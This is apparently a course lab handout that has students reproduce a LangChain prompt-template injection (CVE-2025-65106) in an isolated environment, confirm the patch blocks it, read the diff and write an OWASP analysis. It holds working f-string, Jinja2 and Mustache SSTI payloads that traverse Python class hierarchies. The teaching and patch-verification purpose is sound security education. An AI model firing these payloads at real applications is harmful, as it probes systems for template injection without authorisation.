Lab 8: CVE-2025-65106 Reproduction -- LangChain Jinja2 SSTI · AI-101

Module: 8 (CVE Deep Dive) Duration: 4 hours Substrate: Local Python (isolated venv required) CVE: CVE-2025-65106, GHSA-6qv9-48xg-fc7f Points: 12

Objectives

Set up isolated vulnerable (1.0.6) and patched (1.0.7) LangChain environments
Reproduce the f-string template injection vulnerability
Reproduce the Jinja2 SSTI vulnerability
Read and understand the patch diff
Write the OWASP mapping analysis (graded written component)

Setup: Isolated Vulnerable Environment

SAFETY NOTE: This lab installs a known-vulnerable version of LangChain in an isolated virtualenv. Never install vulnerable packages in your production environment or alongside other projects.

# Create isolated vulnerable environment
python3 -m venv /tmp/vuln-langchain
source /tmp/vuln-langchain/bin/activate

# Install the vulnerable version
pip install "langchain-core==1.0.6" "langchain==1.0.6" openai

# Verify version
python3 -c "import langchain_core; print(langchain_core.__version__)"
# Must print: 1.0.6

echo "Vulnerable environment ready"

Part 1: F-String Template Injection (60 min)

Understand the vulnerable code path first:

# With the vulnerable venv active:
from langchain_core.prompts import PromptTemplate

# The intended use: user supplies variable VALUES, not template strings
safe_template = PromptTemplate(
    input_variables=["topic"],
    template="Tell me about {topic}."
)
result = safe_template.format(topic="cybersecurity")
print("Safe:", result)

The attack surface: when the application accepts user-supplied template strings

# VULNERABLE PATTERN: user controls the template string itself
# This is the CVE-2025-65106 attack surface

def vulnerable_generate_prompt(user_template_string: str, topic: str) -> str:
    """Accepts user-supplied template string -- this is the vulnerable pattern."""
    pt = PromptTemplate(
        input_variables=["topic"],
        template=user_template_string,
        template_format="f_string"
    )
    return pt.format(topic=topic)

# Legitimate use
normal = vulnerable_generate_prompt("Tell me about {topic}.", "Python security")
print("Normal:", normal)
print()

# Attack: f-string allows {variable.attribute} access
# The 'topic' variable is a Python string object with attributes
attack_payloads_fstring = [
    "{topic.__class__}",                           # reveals <class 'str'>
    "{topic.__class__.__mro__}",                   # reveals class hierarchy
    "{topic.__class__.__mro__[1].__subclasses__()[:5]}",  # lists Python subclasses
]

print("=== F-STRING ATTACK RESULTS ===")
for payload in attack_payloads_fstring:
    try:
        result = vulnerable_generate_prompt(payload, "test_input")
        print(f"Payload: {payload}")
        print(f"Result: {result[:200]}")
        print(f"Exposes internals: {'__class__' in result or '__mro__' in result or '[<' in result}")
        print()
    except Exception as e:
        print(f"Payload: {payload}")
        print(f"Error (patched): {e}")
        print()

Record:

What did {topic.__class__} return?
What did {topic.__class__.__mro__} reveal?
How many subclasses appeared in the third payload?
Does any of this output contain information that would be dangerous in a production application?

Part 2: Jinja2 SSTI (60 min)

# Jinja2 format is more powerful -- it has its own expression language
def vulnerable_jinja2_prompt(user_template_string: str, topic: str) -> str:
    """Accepts user-supplied Jinja2 template string."""
    from langchain_core.prompts import PromptTemplate
    pt = PromptTemplate(
        input_variables=["topic"],
        template=user_template_string,
        template_format="jinja2"
    )
    return pt.format(topic=topic)

# Standard Jinja2 SSTI gadgets
jinja2_payloads = [
    # Object hierarchy traversal
    "{{ ''.__class__ }}",
    "{{ ''.__class__.__mro__ }}",
    "{{ ''.__class__.__mro__[1].__subclasses__() }}",

    # Access configuration/environment if available
    "{{ config }}",

    # Attempt to call a method on a subclass
    # (Safe version that just reads -- not RCE)
    "{{ topic.__class__.__name__ }}",
]

print("=== JINJA2 SSTI RESULTS ===")
for payload in jinja2_payloads:
    try:
        result = vulnerable_jinja2_prompt(payload, "security_test")
        print(f"Payload: {payload}")
        print(f"Result preview: {str(result)[:300]}")
        print(f"Exposes internals: {any(x in str(result) for x in ['__class__', 'mro', 'object at'])}")
        print()
    except Exception as e:
        print(f"Payload: {payload}")
        print(f"Error: {type(e).__name__}: {str(e)[:200]}")
        print()

Compare to Mustache format:

def vulnerable_mustache_prompt(user_template_string: str, **kwargs) -> str:
    from langchain_core.prompts import PromptTemplate
    pt = PromptTemplate.from_template(user_template_string, template_format="mustache")
    return pt.format(**kwargs)

# Mustache uses {{variable}} and allows attribute traversal via getattr()
mustache_payloads = [
    "{{topic.__class__}}",
    "{{topic.__class__.__name__}}",
]

print("=== MUSTACHE ATTACK RESULTS ===")
for payload in mustache_payloads:
    try:
        result = vulnerable_mustache_prompt(payload, topic="test")
        print(f"Payload: {payload} -> Result: {str(result)[:200]}")
    except Exception as e:
        print(f"Payload: {payload} -> Error: {type(e).__name__}: {str(e)[:100]}")

Record:

Did Jinja2 SSTI expose the class hierarchy?
Did {{ config }} return anything?
Which format (f-string, jinja2, mustache) had the most severe exposure?
What is the security difference between reading class metadata (what we did) vs. calling os.system() (what a real attacker would do)?

Part 3: Apply the Patch (30 min)

# Deactivate the vulnerable environment
deactivate

# Create patched environment
python3 -m venv /tmp/patched-langchain
source /tmp/patched-langchain/bin/activate

pip install "langchain-core==1.0.7" "langchain==1.0.7" openai

python3 -c "import langchain_core; print('Version:', langchain_core.__version__)"
# Must print: 1.0.7

# Run the same payloads against the patched version
from langchain_core.prompts import PromptTemplate

def patched_prompt(template_str: str, template_format: str, **kwargs) -> str:
    try:
        pt = PromptTemplate(
            input_variables=list(kwargs.keys()),
            template=template_str,
            template_format=template_format
        )
        return pt.format(**kwargs)
    except Exception as e:
        return f"BLOCKED: {type(e).__name__}: {str(e)[:200]}"

print("=== PATCHED VERSION RESULTS ===")
test_cases = [
    ("f_string", "{topic.__class__.__mro__}", {"topic": "test"}),
    ("jinja2", "{{ ''.__class__.__mro__ }}", {"topic": "test"}),
    ("mustache", "{{topic.__class__}}", {"topic": "test"}),
]

for fmt, payload, kwargs in test_cases:
    result = patched_prompt(payload, fmt, **kwargs)
    blocked = "BLOCKED" in result
    print(f"Format: {fmt}")
    print(f"Payload: {payload}")
    print(f"Result: {result[:200]}")
    print(f"Blocked: {blocked}")
    print()

Record:

Were all three format attacks blocked by the patch?
What error type did the patched version raise for each format?
Does the patch break legitimate template use? (Test: patched_prompt("{topic}", "f_string", topic="cybersecurity"))

Part 4: Read the Patch Diff (30 min)

Download and examine the patch:

# Install git if needed
pip install gitpython

# Or just browse on GitHub:
# https://github.com/langchain-ai/langchain/compare/langchain-core==1.0.6...langchain-core==1.0.7

# Alternatively, examine the patched source directly:
import langchain_core
import inspect
import os

# Find the prompt module
prompt_module_path = os.path.dirname(inspect.getfile(langchain_core)) + "/prompts/prompt.py"
print(f"Reading: {prompt_module_path}")

with open(prompt_module_path) as f:
    source = f.read()

# Find the _RestrictedSandboxedEnvironment
if "_RestrictedSandboxedEnvironment" in source:
    start = source.index("_RestrictedSandboxedEnvironment")
    print("Found fix:")
    print(source[max(0, start-200):start+500])
else:
    print("Search for 'sandbox' or 'restricted':")
    for i, line in enumerate(source.split('\n')):
        if any(word in line.lower() for word in ['sandbox', 'restricted', 'validate_var']):
            print(f"Line {i+1}: {line}")

Record:

What class or function implements the Jinja2 sandboxing in the patched version?
Find the f-string variable name validation. What regex or check is used?
Find the Mustache fix. What type checking is applied?

Part 5: Written OWASP Mapping (45 min -- graded)

Write a 3-paragraph analysis (300-500 words total) that addresses:

Paragraph 1: Root Cause and LLM05 Mapping Map CVE-2025-65106 to LLM05:2025 (Improper Output Handling). Explain the specific way that "output" (or in this case, template processing) handled untrusted input without sanitization. Cite the specific vulnerable code behavior.

Paragraph 2: LLM03 Supply Chain Angle Explain why this CVE is also a supply chain issue (LLM03:2025). What was the trust relationship between LangChain and applications that used it? Who was responsible for the vulnerability? Who was responsible for deploying the fix?

Paragraph 3: Real-World Risk and Remediation Describe a realistic production scenario where CVE-2025-65106 would be exploited. What data would be at risk? What is the remediation for applications that cannot immediately upgrade?

Save your analysis as lab-8-owasp-analysis.md in your submission.

Cleanup

deactivate
rm -rf /tmp/vuln-langchain /tmp/patched-langchain

Lab Report

Your lab report for this lab IS the OWASP mapping analysis from Part 5. Submit lab-8-owasp-analysis.md alongside your lab notes.

Grading (12 points)

Item	Points
Part 1: f-string injection reproduced; 4 record questions answered	2
Part 2: Jinja2 SSTI reproduced; format comparison documented	2
Part 3: patch applied; all 3 formats confirmed blocked	2
Part 4: patch diff read; 3 fix locations identified	2
Part 5: OWASP mapping analysis (3 paragraphs, 300-500 words, substantive)	4